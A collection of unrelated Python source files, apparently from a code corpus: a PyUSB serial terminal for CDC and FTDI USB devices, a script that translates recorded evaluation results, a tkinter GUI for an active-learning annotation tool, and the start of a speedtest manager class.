wValueBit Description (2 bytes data)
---------------------------
bit 1 = 0 RTS : de-assert (negative voltage)
bit 1 = 1 RTS : assert (positive voltage)
bit 0 = 0 DTR : de-assert (negative voltage)
bit 0 = 1 DTR : assert (positive voltage)
This tool can be 'compiled' into a windows binary using the following commands
>>> from distutils.core import setup
>>> import py2exe
>>> setup(console=['vcp_terminal.py'])
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import sys
import time
import usb.core as usb
import threading
import logging
try:
import Queue as queue
except ImportError:
import queue
CDC_CMDS = {
"SEND_ENCAPSULATED_COMMAND": 0x00,
"GET_ENCAPSULATED_RESPONSE": 0x01,
"SET_COMM_FEATURE": 0x02,
"GET_COMM_FEATURE": 0x03,
"CLEAR_COMM_FEATURE": 0x04,
"SET_LINE_CODING": 0x20,
"GET_LINE_CODING": 0x21,
"SET_CONTROL_LINE_STATE": 0x22,
"SEND_BREAK": 0x23, # wValue is break time
}
class _Getch(object):
""" Gets a single character from standard input.
Does not echo to the screen.
"""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self):
return self.impl()
class _GetchUnix(object):
def __call__(self):
import sys
import tty
import termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows(object):
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
class ComPort(object):
def __init__(self, usb_device, start=True):
self.device = usb_device
self._isFTDI = False
self._rxinterval = 0.005 # sec
self._rxqueue = queue.Queue()
self._rxthread = None
self._rxactive = False
self.baudrate = 9600
self.parity = 0
self.stopbits = 1
self.databits = 8
cfg = usb_device.get_active_configuration()
if self.device.idVendor == 0x0403: # FTDI device
self._isFTDI = True
log.debug("Configuring as an FTDI device, no cmd itf")
cmd_itfs = None
data_itfs = list(usb.util.find_descriptor(
cfg, find_all=True,
custom_match=lambda e: (e.bInterfaceClass == 0xFF)))
data_itf = data_itfs[0]
itf_num = data_itf.bInterfaceNumber
else:
data_itfs = list(
usb.util.find_descriptor(
cfg,
find_all=True,
custom_match=lambda e: (
e.bInterfaceClass == 0xA)))
if not data_itfs:
print("Unable to connect. No data interfaces on device")
exit()
data_itf = data_itfs[0]
cmd_itfs = list(
usb.util.find_descriptor(
cfg,
find_all=True,
custom_match=lambda e: (
e.bInterfaceClass == 0x2)))
itf_num = cmd_itfs[0].bInterfaceNumber
if len(cmd_itfs) != len(data_itfs):
log.debug("COM port data / command interface mismatch")
ports = len(data_itfs)
log.debug("found {0} COM port\n".format(ports))
try:
self.device.detach_kernel_driver(itf_num)
except usb.USBError:
pass
except NotImplementedError:
pass
self._ep_in = usb.util.find_descriptor(
data_itf, custom_match=lambda e: (
e.bEndpointAddress & 0x80))
self._ep_out = usb.util.find_descriptor(
data_itf, custom_match=lambda e: not (
e.bEndpointAddress & 0x80))
if start:
self._startRx()
def _startRx(self):
if self._rxthread is not None and (
self._rxactive or self._rxthread.isAlive()):
return
self._rxactive = True
self._rxthread = threading.Thread(target=self._read)
self._rxthread.daemon = True
self._rxthread.start()
def _endRx(self):
self._rxactive = False
def _read(self):
""" check ep for data, add it to queue and sleep for interval """
while self._rxactive:
try:
rv = self._ep_in.read(self._ep_in.wMaxPacketSize)
if self._isFTDI:
status = rv[:2] # FTDI prepends 2 flow control characters,
# modem status and line status of the UART
if status[0] != 1 or status[1] != 0x60:
log.info(
"USB Status: 0x{0:02X} 0x{1:02X}".format(
*status))
rv = rv[2:]
for rvi in rv:
self._rxqueue.put(rvi)
except usb.USBError as e:
log.warn("USB Error on _read {}".format(e))
return
time.sleep(self._rxinterval)
def _getRxLen(self):
return self._rxqueue.qsize()
rxlen = property(fget=_getRxLen)
def readBytes(self):
rx = []
while not self._rxqueue.empty():
rx.append(self._rxqueue.get())
return rx
def readText(self):
return "".join(chr(c) for c in self.readBytes())
def write(self, data):
try:
ret = self._ep_out.write(data)
except usb.USBError as e:
log.warn("USB Error on write {}".format(e))
return
if len(data) != ret:
log.error(
"Bytes written mismatch {0} vs {1}".format(
len(data), ret))
else:
log.debug("{} bytes written to ep".format(ret))
def setControlLineState(self, RTS=None, DTR=None):
ctrlstate = (2 if RTS else 0) + (1 if DTR else 0)
if self._isFTDI:
ctrlstate += (1 << 8) if DTR is not None else 0
ctrlstate += (2 << 8) if RTS is not None else 0
txdir = 0 # 0:OUT, 1:IN
req_type = 2 if self._isFTDI else 1 # 0:std, 1:class, 2:vendor
# 0:device, 1:interface, 2:endpoint, 3:other
recipient = 0 if self._isFTDI else 1
req_type = (txdir << 7) + (req_type << 5) + recipient
wlen = self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=1 if self._isFTDI else CDC_CMDS["SET_CONTROL_LINE_STATE"],
wValue=ctrlstate,
wIndex=1 if self._isFTDI else 0,
data_or_wLength=0)
log.debug("Linecoding set, {}b sent".format(wlen))
def setLineCoding(self, baudrate=None, parity=None,
databits=None, stopbits=None):
sbits = {1: 0, 1.5: 1, 2: 2}
dbits = {5, 6, 7, 8, 16}
pmodes = {0, 1, 2, 3, 4}
brates = {300, 600, 1200, 2400, 4800, 9600, 14400,
19200, 28800, 38400, 57600, 115200, 230400}
if stopbits is not None:
if stopbits not in sbits.keys():
valid = ", ".join(str(k) for k in sorted(sbits.keys()))
raise ValueError("Valid stopbits are " + valid)
self.stopbits = stopbits
if databits is not None:
if databits not in dbits:
valid = ", ".join(str(d) for d in sorted(dbits))
raise ValueError("Valid databits are " + valid)
self.databits = databits
if parity is not None:
if parity not in pmodes:
valid = ", ".join(str(pm) for pm in sorted(pmodes))
raise ValueError("Valid parity modes are " + valid)
self.parity = parity
if baudrate is not None:
if baudrate not in brates.keys():
brs = sorted(brates.keys())
dif = [abs(br - baudrate) for br in brs]
best = brs[dif.index(min(dif))]
raise ValueError(
"Invalid baudrates, nearest valid is {}".format(best))
self.baudrate = baudrate
if self._isFTDI:
self._setBaudFTDI(self.baudrate)
self._setLineCodeFTDI(
bits=self.databits,
stopbits=sbits[self.stopbits],
parity=self.parity,
breaktype=0)
else:
linecode = [
self.baudrate & 0xff,
(self.baudrate >> 8) & 0xff,
(self.baudrate >> 16) & 0xff,
(self.baudrate >> 24) & 0xff,
sbits[self.stopbits],
self.parity,
self.databits]
txdir = 0 # 0:OUT, 1:IN
req_type = 1 # 0:std, 1:class, 2:vendor
recipient = 1 # 0:device, 1:interface, 2:endpoint, 3:other
req_type = (txdir << 7) + (req_type << 5) + recipient
wlen = self.device.ctrl_transfer(
req_type, CDC_CMDS["SET_LINE_CODING"],
data_or_wLength=linecode)
log.debug("Linecoding set, {}b sent".format(wlen))
def _setBaudFTDI(self, baudrate):
if not self._isFTDI:
return
actual_baud, value, ndex = ftdi_to_clkbits(baudrate)
log.debug("Actual baud: {}, Value 0x{:X}, Index {}".format(
actual_baud, value, ndex))
txdir = 0 # 0:OUT, 1:IN
req_type = 2 # 0:std, 1:class, 2:vendor
recipient = 0 # 0:device, 1:interface, 2:endpoint, 3:other
req_type = (txdir << 7) + (req_type << 5) + recipient
self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=3,
wValue=value,
wIndex=ndex,
data_or_wLength=0)
log.debug("FTDI Baudrate set to {}".format(actual_baud))
def _setLineCodeFTDI(self, bits, stopbits, parity, breaktype=0):
if not self._isFTDI:
return
value = bits
value += parity << 8
value += stopbits << 11
value += breaktype << 14
txdir = 0 # 0:OUT, 1:IN
req_type = 2 # 0:std, 1:class, 2:vendor
recipient = 0 # 0:device, 1:interface, 2:endpoint, 3:other
req_type = (txdir << 7) + (req_type << 5) + recipient
wlen = self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=4, # line coding
wValue=value,
wIndex=1,
data_or_wLength=0)
return wlen
def _resetFTDI(self):
""" reset the FTDI device
"""
if not self._isFTDI:
return
txdir = 0 # 0:OUT, 1:IN
req_type = 2 # 0:std, 1:class, 2:vendor
recipient = 0 # 0:device, 1:interface, 2:endpoint, 3:other
req_type = (txdir << 7) + (req_type << 5) + recipient
self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=0, # RESET
wValue=0, # RESET
wIndex=1,
data_or_wLength=0)
def _flushFTDI(self, rx=True, tx=True):
""" flush rx / tx buffers for ftdi device
"""
if not self._isFTDI:
return
txdir = 0 # 0:OUT, 1:IN
req_type = 2 if self._isFTDI else 1 # 0:std, 1:class, 2:vendor
# 0:device, 1:interface, 2:endpoint, 3:other
recipient = 0 if self._isFTDI else 1
req_type = (txdir << 7) + (req_type << 5) + recipient
if rx:
self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=0, # RESET
wValue=1, # PURGE RX
wIndex=1, # INTERFACE 1
data_or_wLength=0)
if tx:
self.device.ctrl_transfer(
bmRequestType=req_type,
bRequest=0, # RESET
wValue=2, # PURGE TX
wIndex=1, # INTERFACE 1
data_or_wLength=0)
def getLineCoding(self):
if self._isFTDI:
log.warning("FTDI does not support reading baud parameters")
txdir = 1 # 0:OUT, 1:IN
req_type = 1 # 0:std, 1:class, 2:vendor
recipient = 1 # 0:device, 1:interface, 2:endpoint, 3:other
req_type = (txdir << 7) + (req_type << 5) + recipient
buf = self.device.ctrl_transfer(bmRequestType=req_type,
bRequest=CDC_CMDS["GET_LINE_CODING"],
wValue=0,
wIndex=0,
data_or_wLength=255,
)
self.baudrate = buf[0] + (buf[1] << 8) + \
(buf[2] << 16) + (buf[3] << 24)
self.stopbits = 1 + (buf[4] / 2.0)
self.parity = buf[5]
self.databits = buf[6]
print("LINE CODING:")
print(" {0} baud, parity mode {1}".format(self.baudrate, self.parity))
print(
" {0} data bits, {1} stop bits".format(
self.databits,
self.stopbits))
def disconnect(self):
self._endRx()
while self._rxthread is not None and self._rxthread.isAlive():
pass
usb.util.dispose_resources(self.device)
if self._rxthread is None:
log.debug("Rx thread never existed")
else:
log.debug("Rx thread is {}".format(
"alive" if self._rxthread.isAlive() else "dead"))
attempt = 1
while attempt < 10:
try:
self.device.attach_kernel_driver(0)
log.debug(
"Attach kernal driver on attempt {0}".format(attempt))
break
except usb.USBError:
attempt += 1
time.sleep(0.1) # sleep seconds
if attempt == 10:
log.error("Could not attach kernal driver")
def configLog():
log = logging.getLogger("vcp_terminal")
log.setLevel(logging.DEBUG)
if "PYTERMINAL_DEBUG" in os.environ:
fileHandler = logging.FileHandler("terminal.log")
log_fmt = logging.Formatter(
"%(levelname)s %(name)s %(threadName)-10s " +
"%(funcName)s() %(message)s")
fileHandler.setFormatter(log_fmt)
log.addHandler(fileHandler)
return log
def selectDevice():
devices = [d for d in usb.find(find_all=True)
if d.bDeviceClass in {0, 2, 0xff}]
if not devices:
print("No devices detected")
return None
selection = -1
selected = False
print("PyUSB VCP Terminal: use ctrl+c or ctrl+d to exit")
while not selected:
for i, d in enumerate(devices):
try:
manufacturer = d.manufacturer + " "
except:
manufacturer = "Unknown"
try:
prod = d.product + " "
except:
prod = ""
try:
serial = d.serial_number + " "
except:
serial = ""
print(
"%d: %04x:%04x on Bus %03d %03d %s%s%s" %
(i,
d.idVendor,
d.idProduct,
d.bus,
d.address,
manufacturer,
prod,
serial))
selection = input("Enter device: ")
try:
selection = int(selection)
if selection < 0 or selection >= len(devices):
raise Exception()
selected = True
except:
print(
"Please enter number between 0 and {}".format(
len(devices) - 1))
d = devices[selection]
return d
def configInputQueue():
""" configure a queue for accepting characters and return the queue
"""
def captureInput(iqueue):
while True:
c = getch()
if c == '\x03' or c == '\x04': # end on ctrl+c / ctrl+d
log.debug("Break received (\\x{0:02X})".format(ord(c)))
iqueue.put(c)
break
log.debug(
"Input Char '{}' received".format(
c if c != '\r' else '\\r'))
iqueue.put(c)
input_queue = queue.Queue()
input_thread = threading.Thread(target=lambda: captureInput(input_queue))
input_thread.daemon = True
input_thread.start()
return input_queue, input_thread
def fmt_text(text):
""" convert characters that aren't printable to hex format
"""
PRINTABLE_CHAR = set(
list(range(ord(' '), ord('~') + 1)) + [ord('\r'), ord('\n')])
newtext = ("\\x{:02X}".format(
c) if c not in PRINTABLE_CHAR else chr(c) for c in text)
textlines = "\r\n".join(l.strip('\r')
for l in "".join(newtext).split('\n'))
return textlines
def runTerminal(d):
log.info("Beginning a terminal run")
p = ComPort(d)
p.setControlLineState(True, True)
p.setLineCoding()
q, t = configInputQueue()
while True:
if p.rxlen:
print(fmt_text(p.readBytes()), end="")
if not q.empty():
c = q.get()
if c == '\x03' or c == '\x04': # end on ctrl+c / ctrl+d
print()
p.disconnect()
break
try:
p.write(c)
except usb.USBError as e:
log.warn("USB Error on write {}".format(e))
return
def ftdi_to_clkbits(baudrate): # from libftdi
"""
10,27 => divisor = 10000, rate = 300
88,13 => divisor = 5000, rate = 600
C4,09 => divisor = 2500, rate = 1200
E2,04 => divisor = 1250, rate = 2,400
71,02 => divisor = 625, rate = 4,800
38,41 => divisor = 312.5, rate = 9,600
D0,80 => divisor = 208.25, rate = 14406
9C,80 => divisor = 156, rate = 19,230
4E,C0 => divisor = 78, rate = 38,461
34,00 => divisor = 52, rate = 57,692
1A,00 => divisor = 26, rate = 115,384
0D,00 => divisor = 13, rate = 230,769
"""
clk = 48000000
clk_div = 16
frac_code = [0, 3, 2, 4, 1, 5, 6, 7]
actual_baud = 0
if baudrate >= clk / clk_div:
encoded_divisor = 0
actual_baud = (clk // clk_div)
elif baudrate >= clk / (clk_div + clk_div / 2):
encoded_divisor = 1
actual_baud = clk // (clk_div + clk_div // 2)
elif baudrate >= clk / (2 * clk_div):
encoded_divisor = 2
actual_baud = clk // (2 * clk_div)
else:
# We divide by 16 to have 3 fractional bits and one bit for rounding
divisor = clk * 16 // clk_div // baudrate
best_divisor = (divisor + 1) // 2
if best_divisor > 0x20000:
best_divisor = 0x1ffff
actual_baud = clk * 16 // clk_div // best_divisor
actual_baud = (actual_baud + 1) // 2
encoded_divisor = ((best_divisor >> 3) +
(frac_code[best_divisor & 0x7] << 14))
value = encoded_divisor & 0xFFFF
index = encoded_divisor >> 16
return actual_baud, value, index
if __name__ == '__main__':
log = configLog()
getch = _Getch() # init an instance
d = selectDevice()
if d is None:
exit()
if sys.argv[-1] == '-d':
""" use ...pyusb$ ipython3 -i toots/terminal.py -- -d """
p = ComPort(d, start=False)
print("Debug mode: p is ComPort, d is pyusb Device")
else:
runTerminal(d)
def show_fti_baud():
brates = [300, 600, 1200, 2400, 4800, 9600, 14400,
19200, 28800, 38400, 57600, 115200, 230400]
for br in brates:
br_ftdi, value, index = ftdi_to_clkbits(br)
print("{:7} | {:7} | {:5.1%} | wVal {:4X}h | wIndex {:4X}h".format(
br, br_ftdi, (br - br_ftdi) * 1.0 / br, value, index))
|
translate.py | import argparse
import gzip
import os
import pickle
import sys
import time
import traceback
from multiprocessing import Process
from typing import List
from Evaluator.CodeInspection.utils import mkdirRecursive
from Evaluator.EventTranslation import EventProcessor, DEFAULT_TRANSLATORS
from Evaluator.Ranking import MetaRanking
def translate_file(path: str, event_processor: EventProcessor, output_dir: str):
"""
Translate a single result file with the given event processor.
:param path: The result file's path
:param event_processor: The EventProcessor instance to translate the result file with
:param output_dir: The directory to put the translated results in
"""
assert os.path.exists(path)
try:
with gzip.open(path) as f:
_results = pickle.load(f)
print(
f"Translating results from {_results.project_name}, bug {_results.bug_id}"
)
mr = MetaRanking(*event_processor.process(_results), _results)
output_file = f"{output_dir}/{_results.project_name}/translated_results_{_results.project_name}_{_results.bug_id}.pickle.gz"
if not os.path.exists(os.path.dirname(os.path.abspath(output_file))):
mkdirRecursive(os.path.dirname(os.path.abspath(output_file)))
if os.path.exists(output_file):
os.remove(output_file)
with gzip.open(output_file, "xb") as f:
pickle.dump(mr, f)
print("Succeeded " + path)
except Exception as e:
print(type(e))
traceback.print_tb(e.__traceback__)
print("Failed " + path)
def translate_directory(path: str, event_processor: EventProcessor, output_dir: str):
"""
Translate every result file in the given directory
:param event_processor: The EventProcessor instance to translate the result file with
:param output_dir: The directory to put the translated results in
"""
assert os.path.isdir(path)
for filename in sorted(os.listdir(path)):
if os.path.isdir(f"{str(path)}/{filename}"):
continue
translate_file(f"{str(path)}/{filename}", event_processor, output_dir)
return
def get_subdirs_recursive(start_path: str) -> List[str]:
"""
Recursively search the given directory for subdirectories
:param start_path: The root directory of the search
:return: A list of subdirectories
"""
contents = os.listdir(start_path)
dirs = []
for f in contents:
if os.path.isdir(f"{start_path}/{f}"):
dirs.append(os.path.realpath(f"{start_path}/{f}"))
dirs.extend(get_subdirs_recursive(os.path.realpath(f"{start_path}/{f}")))
return dirs
def translate_directory_parallel(
path: str, event_processor: EventProcessor, output_dir: str, threads: int = -1
):
"""
Translate every result file recursively found in the given directory
:param path: The directory to recursively search for result files
:param event_processor: The EventProcessor instance to translate the result file with
:param output_dir: The directory to put the translated results in
:param threads: The number of parallel threads to create. Default is the number of available cores
"""
if threads < 1:
threads = os.cpu_count()
dirs = get_subdirs_recursive(path) + [path]
processes = [
Process(
target=translate_directory, args=(d, event_processor, output_dir), name=d
)
for d in dirs
]
active_processes = []
while len(processes) > 0:
while len(active_processes) < threads and len(processes) > 0:
p = processes.pop()
p.start()
active_processes.append(p)
for p in active_processes.copy():
if not p.is_alive():
active_processes.remove(p)
time.sleep(0.1)
if __name__ == "__main__":
DEFAULT_OUTPUT = ""
arg_parser = argparse.ArgumentParser(
description="Translate raw, recorded events to Evaluation Framework events."
)
arg_parser.add_argument(
"-d",
"--directory",
required=True,
type=str,
default="",
help="The file containing the recorded events",
)
arg_parser.add_argument(
"-r", "--recursive", help="Search for files recursively", action="store_true"
)
arg_parser.add_argument(
"-o",
"--output_dir",
required=False,
type=str,
default=DEFAULT_OUTPUT,
help="The output diretory",
)
args = arg_parser.parse_args()
event_processor = EventProcessor(DEFAULT_TRANSLATORS)
output_dir = args.output_dir
if output_dir == "":
output_dir = (
os.path.dirname(os.path.abspath(sys.argv[0])) + f"/results_translated"
)
if args.recursive:
translate_directory_parallel(args.directory, event_processor, output_dir)
else:
translate_directory(args.directory, event_processor, output_dir)
|
main_panel.py | from idlelib.tooltip import Hovertip
import numpy
import support
import tkinter as tk
import PIL.Image
from threading import Thread
from tkinter.constants import END
from tkinter import *
from tkinter import messagebox
from tkinter.filedialog import askdirectory
from PIL import ImageTk
from UI import ui_constants
from technique_type import TechniqueType
from model import start_exploiting_gradient
from support import parse_bool
class MainPanel:
def __init__(self, master):
support._print_delegate = self
self.printing_progress = False
# base data
self.techniques = ((ui_constants.text_ssd_technique, 0), (ui_constants.text_sod_technique, 1), (ui_constants.text_csd_technique, 2), (ui_constants.text_cod_technique, 3))
self.technique = TechniqueType.SCORE_SINGLE_DISTANCE
self.technique_selection = IntVar(0)
self.base_folder = None
self.reproducibility = False
self.use_features = False
self.resume = False
# setting UI
self.root = master
# setting title
self.root.title(ui_constants.text_tool_name)
# setting window size
width = 900
height = 570
screenwidth = self.root.winfo_screenwidth()
screenheight = self.root.winfo_screenheight()
align_string = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
self.root.geometry(align_string)
self.root.resizable(width=False, height=False)
button_select_dataset_folder = tk.Button(self.root)
button_select_dataset_folder["bg"] = ui_constants.color_bg_button
button_select_dataset_folder["fg"] = ui_constants.color_fg_button
button_select_dataset_folder["text"] = ui_constants.text_select_dataset_folder
button_select_dataset_folder.place(x=340, y=10, width=193, height=30)
button_select_dataset_folder["command"] = self.select_dataset_folder
label_quantity_samples_to_select = tk.Label(self.root)
label_quantity_samples_to_select["justify"] = "left"
label_quantity_samples_to_select["text"] = ui_constants.text_quantity_samples_to_select + ":"
label_quantity_samples_to_select.place(x=10, y=80, width=200, height=30)
Hovertip(label_quantity_samples_to_select, ui_constants.text_description_quantity_samples_to_select)
self.entry_quantity_samples_to_select = tk.Entry(self.root)
self.entry_quantity_samples_to_select.insert(0, "500")
self.entry_quantity_samples_to_select.place(x=220, y=80, width=70, height=30)
label_limit_samples = tk.Label(self.root)
label_limit_samples["justify"] = "left"
label_limit_samples["text"] = ui_constants.text_limit_samples + ":"
label_limit_samples.place(x=10, y=160, width=200, height=30)
label_limit_samples.place(x=10, y=120, width=200, height=30)
Hovertip(label_limit_samples, ui_constants.text_description_limit_samples)
self.entry_limit_samples = tk.Entry(self.root)
self.entry_limit_samples.insert(0, "-1")
self.entry_limit_samples.place(x=220, y=120, width=70, height=30)
label_resume = tk.Label(self.root)
label_resume["justify"] = "left"
label_resume["text"] = ui_constants.text_resume + ":"
label_resume.place(x=10, y=160, width=200, height=30)
Hovertip(label_resume, ui_constants.text_description_resume)
check_resume = tk.Checkbutton(self.root)
check_resume["offvalue"] = "0"
check_resume["onvalue"] = "1"
check_resume["command"] = self.set_resume
check_resume.place(x=220, y=160, width=70, height=30)
label_reproducibility = tk.Label(self.root)
label_reproducibility["justify"] = "left"
label_reproducibility["text"] = ui_constants.text_reproducibility + ":"
label_reproducibility.place(x=10, y=200, width=200, height=30)
Hovertip(label_reproducibility, ui_constants.text_description_reproducibility)
check_reproducibility = tk.Checkbutton(self.root)
check_reproducibility["offvalue"] = "0"
check_reproducibility["onvalue"] = "1"
check_reproducibility["command"] = self.set_reproducibility
check_reproducibility.place(x=220, y=200, width=70, height=30)
label_use_features = tk.Label(self.root)
label_use_features["justify"] = "left"
label_use_features["text"] = ui_constants.text_use_features + ":"
label_use_features.place(x=10, y=240, width=200, height=30)
Hovertip(label_use_features, ui_constants.text_description_use_features)
check_use_features = tk.Checkbutton(self.root)
check_use_features["offvalue"] = "0"
check_use_features["onvalue"] = "1"
check_use_features["command"] = self.set_use_features
check_use_features.place(x=220, y=240, width=70, height=30)
label_training_epochs = tk.Label(self.root)
label_training_epochs["justify"] = "left"
label_training_epochs["text"] = ui_constants.text_training_epochs + ":"
label_training_epochs.place(x=520, y=80, width=200, height=30)
Hovertip(label_training_epochs, ui_constants.text_description_training_epochs)
self.entry_training_epochs = tk.Entry(self.root)
self.entry_training_epochs.insert(0, "10")
self.entry_training_epochs.place(x=730, y=80, width=70, height=30)
label_active_epochs = tk.Label(self.root)
label_active_epochs["justify"] = "left"
label_active_epochs["text"] = ui_constants.text_active_epochs + ":"
label_active_epochs.place(x=520, y=120, width=200, height=30)
Hovertip(label_active_epochs, ui_constants.text_description_active_epochs)
self.entry_active_epochs = tk.Entry(self.root)
self.entry_active_epochs.insert(0, "10")
self.entry_active_epochs.place(x=730, y=120, width=70, height=30)
label_technique = tk.Label(self.root)
label_technique["justify"] = "left"
label_technique["text"] = ui_constants.text_technique + ":"
label_technique.place(x=520, y=160, width=200, height=30)
Hovertip(label_technique, ui_constants.text_description_technique)
radio_ssd = tk.Radiobutton(self.root)
radio_ssd["value"] = 0
radio_ssd["variable"] = self.technique_selection
radio_ssd["justify"] = "left"
radio_ssd["text"] = ui_constants.text_ssd_technique
radio_ssd["command"] = self.select_technique
radio_ssd.place(x=740, y=160, width=50, height=30)
Hovertip(radio_ssd, ui_constants.text_description_ssd)
radio_sod = tk.Radiobutton(self.root)
radio_sod["value"] = 1
radio_sod["variable"] = self.technique_selection
radio_sod["justify"] = "left"
radio_sod["text"] = ui_constants.text_sod_technique
radio_sod["command"] = self.select_technique
radio_sod.place(x=740, y=180, width=50, height=30)
Hovertip(radio_sod, ui_constants.text_description_sod)
radio_csd = tk.Radiobutton(self.root)
radio_csd["value"] = 2
radio_csd["variable"] = self.technique_selection
radio_csd["justify"] = "left"
radio_csd["text"] = ui_constants.text_csd_technique
radio_csd["command"] = self.select_technique
radio_csd.place(x=740, y=200, width=50, height=30)
Hovertip(radio_csd, ui_constants.text_description_csd)
radio_cod = tk.Radiobutton(self.root)
radio_cod["value"] = 3
radio_cod["variable"] = self.technique_selection
radio_cod["justify"] = "left"
radio_cod["text"] = ui_constants.text_cod_technique
radio_cod["command"] = self.select_technique
radio_cod.place(x=740, y=220, width=50, height=30)
Hovertip(radio_cod, ui_constants.text_description_cod)
self.button_play_active_learning = tk.Button(self.root)
self.button_play_active_learning["bg"] = ui_constants.color_bg_button
self.button_play_active_learning["fg"] = ui_constants.color_fg_button
self.button_play_active_learning["text"] = ui_constants.text_play_active_learning
self.button_play_active_learning["command"] = self.play_active_learning
self.button_play_active_learning.place(x=350, y=320, width=180, height=30)
self.output_area = tk.Text(self.root, state="disabled")
self.output_area["fg"] = "#333333"
self.output_area.place(x=50, y=370, width=800, height=200)
def select_dataset_folder(self):
self.base_folder = askdirectory()
def set_reproducibility(self):
self.reproducibility = not self.reproducibility
def set_use_features(self):
self.use_features = not self.use_features
def set_resume(self):
self.resume = not self.resume
def select_technique(self):
selection = self.technique_selection.get()
if selection == 0:
self.technique = TechniqueType.SCORE_SINGLE_DISTANCE
elif selection == 1:
self.technique = TechniqueType.SCORE_OTHER_DISTANCE
elif selection == 2:
self.technique = TechniqueType.CLASS_SINGLE_DISTANCE
elif selection == 3:
self.technique = TechniqueType.CLASS_OTHER_DISTANCE
elif selection == 4:
self.technique = TechniqueType.RANDOM
elif selection == 5:
self.technique = TechniqueType.LEAST_CONFIDENCE
def play_active_learning(self):
try:
base_folder = self.base_folder
samples_to_select = int(self.entry_quantity_samples_to_select.get())
limit_samples = int(self.entry_limit_samples.get())
resume = parse_bool(self.resume)
reproducibility = parse_bool(self.reproducibility)
use_features = parse_bool(self.use_features)
training_epochs = int(self.entry_training_epochs.get())
active_epochs = int(self.entry_active_epochs.get())
technique = self.technique
except:
messagebox.showinfo(title=ui_constants.text_oops, message=ui_constants.text_all_fields_numbers)
return
if base_folder is None or base_folder == "":
messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_dataset_folder))
return
elif samples_to_select is None or samples_to_select == "":
messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_quantity_samples_to_select))
return
elif limit_samples is None or limit_samples == "":
messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_limit_samples))
return
elif training_epochs is None or training_epochs == "":
messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_training_epochs))
return
elif active_epochs is None or active_epochs == "":
messagebox.showinfo(title=ui_constants.text_oops, message="{} '{}'!".format(ui_constants.text_you_should_put, ui_constants.text_active_epochs))
return
self.button_play_active_learning["command"] = self.show_alert_working
thread = Thread(target=start_exploiting_gradient, args=(samples_to_select, limit_samples, resume, reproducibility, use_features, training_epochs, active_epochs, technique, base_folder, self, self.completed_task))
thread.start()
def completed_task(self, technique, elapsed_time, loss, accuracy):
self.print_message("Completed, below the results:\nUsed technique: {}\nActive Learning training time: {}\nLoss after first training: {}\nLoss after exploiting gradient: {}\nAccuracy after first training: {}\nAccuracy after exploiting gradient: {}\n".format(technique, elapsed_time, loss[0], loss[1], accuracy[0], accuracy[1]))
self.button_play_active_learning["command"] = self.play_active_learning
messagebox.showinfo(title=ui_constants.text_oops, message=ui_constants.text_completed)
def annotate(self, sample_to_annotate):
# setting variables
clicked = IntVar(0)
self.class_selection = IntVar(0)
self.selection = 0
# setting UI
appended_root = tk.Toplevel(self.root)
# setting title
appended_root.title(ui_constants.text_annotate)
# setting layout
width = 700
height = 700
screenwidth = appended_root.winfo_screenwidth()
screenheight = appended_root.winfo_screenheight()
align_string = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
appended_root.geometry(align_string)
appended_root.resizable(width=False, height=False)
top_image_render = ImageTk.PhotoImage(PIL.Image.open(sample_to_annotate))
image_to_annotate=tk.Label(appended_root, image=top_image_render)
image_to_annotate.image = top_image_render
image_to_annotate.place(x=100, y=60, width=500, height=500)
radio_contains = tk.Radiobutton(appended_root)
radio_contains["value"] = 0
radio_contains["variable"] = self.class_selection
radio_contains["justify"] = "left"
radio_contains["text"] = ui_constants.text_contains
radio_contains["command"] = self.select_class
radio_contains.place(x=250, y=600, width=100, height=30)
radio_not_contains = tk.Radiobutton(appended_root)
radio_not_contains["value"] = 1
radio_not_contains["variable"] = self.class_selection
radio_not_contains["justify"] = "left"
radio_not_contains["text"] = ui_constants.text_not_contains
radio_not_contains["command"] = self.select_class
radio_not_contains.place(x=350, y=600, width=100, height=30)
button_elaborate = tk.Button(appended_root)
button_elaborate["bg"] = ui_constants.color_bg_button
button_elaborate["fg"] = ui_constants.color_fg_button
button_elaborate["justify"] = "center"
button_elaborate["text"] = ui_constants.text_annotate
button_elaborate["relief"] = "flat"
button_elaborate.place(x=250, y=650, width=200, height=30)
button_elaborate["command"] = lambda: clicked.set(1)
button_elaborate.wait_variable(clicked)
appended_root.destroy()
return numpy.array([0, 1]) if self.selection == 0 else numpy.array([1, 0])
def select_class(self):
self.selection = self.class_selection.get()
def show_alert_working(self):
messagebox.showinfo(title=ui_constants.text_oops, message=ui_constants.text_process_running)
def print_message(self, message):
if self.printing_progress:
self.output_area.configure(state="normal")
self.output_area.insert(END, "\n")
self.output_area.configure(state="disabled")
self.printing_progress = False
self.output_area.configure(state="normal")
self.output_area.insert(END, "{}\n".format(message))
self.output_area.configure(state="disabled")
def print_progress_bar(self, message):
self.printing_progress = True
previous_text = self.output_area.get("1.0", "end - 1 lines")
self.output_area.configure(state="normal")
self.output_area.delete(1.0, "end")
self.output_area.insert(END, "{}{}".format(previous_text, message))
self.output_area.configure(state="disabled")
|
manager.py | import json
import threading
import time
from datetime import datetime
import requests
import speedtest
from bson.json_util import dumps
from . import settings
from . import database
from .logger import logger
class SpeedtestMgr:
def __init__(self):
self.st = speedtest.Speedtest()
self.do_run = True
self.pause = False
self.last_result = None
